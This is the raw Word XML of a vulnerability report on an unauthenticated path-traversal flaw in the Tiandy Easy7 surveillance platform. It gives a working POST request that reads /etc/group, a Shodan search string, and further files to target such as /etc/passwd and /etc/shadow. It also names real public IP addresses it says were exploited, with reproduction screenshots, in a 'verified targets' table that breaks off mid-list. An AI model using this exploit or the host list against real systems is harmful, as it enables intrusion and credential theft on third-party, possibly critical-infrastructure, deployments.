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0DC24">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Tiandy Easy7 — Arbitrary File Read Vulnerability (Path Traversal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34188170">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65004ECD">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiandy Easy7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a video surveillance management platform developed by Tiandy Technologies Co., Ltd. The platform is widely deployed in critical infrastructure and public security sectors. A path traversal vulnerability exists in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/Easy7/rest/file/downloadResource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> endpoint, allowing unauthenticated attackers to read arbitrary files on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDB156">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EF4450">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Affected Product</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385D063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Vendor</w:t>
      </w:r>
      <w:r>
        <w:t>: Tiandy Technologies Co., Ltd (天地伟业技术有限公司)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3862DA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Product</w:t>
      </w:r>
      <w:r>
        <w:t>: Easy7 Integrated Management Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446D613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Affected Endpoint</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/Easy7/rest/file/downloadResource</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CB622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Shodan Dork</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>app="Tiandy-Easy7"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2D9DB7">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B75344F">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A742C2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52"/>
        <w:gridCol w:w="6464"/>
      </w:tblGrid>
      <w:tr w14:paraId="14C4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07C790B">
            <w:pPr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66E2909A">
            <w:pPr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0DE3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0CD830">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="385DBA8F">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0EA3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254D84">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="7E2F5A83">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>9.8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1900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3FD5B6C">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="1F146472">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4154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C7F48A">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="53C08EC2">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="53147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E8A58A">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="4610A6DF">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>None required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0351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2D0F6F5">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="20E3AA45">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Arbitrary file read, sensitive information disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AE9A192">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AB7BA">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Root Cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEAA0DB">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>downloadResource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> endpoint in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/Easy7/rest/file/downloadResource</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> accepts a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>srsPathId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter without proper path sanitization. The application does not validate or restrict user-supplied file paths, allowing directory traversal sequences (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>../../</w:t>
      </w:r>
      <w:r>
        <w:t>) to escape the intended directory and read arbitrary files from the server filesystem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3690D5">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F789BFD">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The vulnerable handler concatenates user input directly into the file path without filtering path traversal characters like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t>, enabling attackers to read any file accessible to the application process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764B51C4">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D19CD7D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B54E6F">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1 — Identify the Vulnerable Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595A4190">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The system exposes a REST API for file download at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/Easy7/rest/file/downloadResource</w:t>
      </w:r>
      <w:r>
        <w:t>. This interface does not require authentication and accepts requests from unauthenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3BE829">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52D4FD">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2 — Discover the Path Traversal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4801D5C8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>srsPathId</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> parameter accepts relative path components. By inserting </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>../../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sequences, an attacker can navigate outside the intended resource directory and read system files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0668D787">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF6017E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3 — Exploit the Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060419B">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following request reads the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/etc/group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file on a Linux-based deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E969C98">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC42DB2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POST /Easy7/rest/file/downloadResource HTTP/1.1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Host: target:7000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Content-Type: application/x-www-form-urlencoded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path=group&amp;srsPathId=../../etc/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BE59DAB">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDA772C">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Other sensitive files that can be read include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF7C66">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4003F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/etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — system user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321B218A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/etc/shadow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — password hashes (if running as root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCCCAC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Application configuration files containing database credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E2A657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System log files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAB889C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Source code and deployment packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332E28A5">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB6274F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D9E1AAA">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204B1923">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A5BD23">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>An unauthenticated remote attacker can:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039016E3">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA125BA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Read arbitrary system files</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — including </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/etc/passwd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/etc/group</w:t>
      </w:r>
      <w:r>
        <w:t>, configuration files, and logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F40622D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Extract sensitive credentials</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — database passwords, API keys, and other secrets stored in configuration files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630308F7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Gain intelligence for further attacks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — leaked source code, system architecture information, and credential material can facilitate deeper compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E51A2F6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Cause information leakage</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — widespread exposure given Tiandy Easy7 is commonly used in critical infrastructure environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F765C86">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469D8E50">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="auto" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10FE43DC">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1A018D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF0D3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POST /Easy7/rest/file/downloadResource HTTP/1.1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Host: &lt;target_ip&gt;:7000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Content-Type: application/x-www-form-urlencoded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path=group&amp;srsPathId=../../etc/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FB57A87">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82BE0F">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This request reads </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/etc/group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444C78C1">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D08A2">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Reproduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7BDAC8">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCF317D">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>http://111.15.182.49:7000/Easy7/index.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and sending the PoC request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99EEC7">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1C142">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3495960C">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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636895" cy="1678940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="image-2026070723332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-20260707233324902"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4"/>
                    <a:srcRect t="19635" r="1651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7655">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59D0195F">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>/etc/group</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43874D71">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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29605" cy="3250565"/>
            <wp:effectExtent l="0" t="0" r="635" b="10795"/>
            <wp:docPr id="2" name="图片 2" descr="image-2026070723350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607072335030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61EA">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="774D2871">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4A4B7">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3F7682">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>http://125.64.77.124:7000/Easy7/index.html</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45DB62">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5729605" cy="3282315"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="3" name="图片 3" descr="image-20260707233516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607072335161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E313">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4B3390">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E8E40C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Target 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9419C8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
        </w:rPr>
        <w:t>http://60.10.182.45:7000/Easy7/index.html</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBF62B">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w: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725160" cy="3403600"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10160"/>
            <wp:docPr id="5" name="图片 5" descr="6280568f1a6f810bdd2790756d6eb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280568f1a6f810bdd2790756d6ebe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087">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E807C8">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CFE12C">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:after="200"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Verified Targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B505FA2">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>The following publicly exposed instances were confirmed vulnerable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1802C2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11"/>
        <w:gridCol w:w="3005"/>
      </w:tblGrid>
      <w:tr w14:paraId="6862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C0A48F0">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6FBD318E">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4D33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4BE27B">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>220.166.78.145</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="6628F0EF">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7254E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F39C95">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>111.15.182.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="4B260F71">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3968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8402F9">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>117.174.186.220</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="1FB1DDB8">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="259B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AD0C2B">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>116.132.17.74</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p w14:paraId="36DA0B50">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>7000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
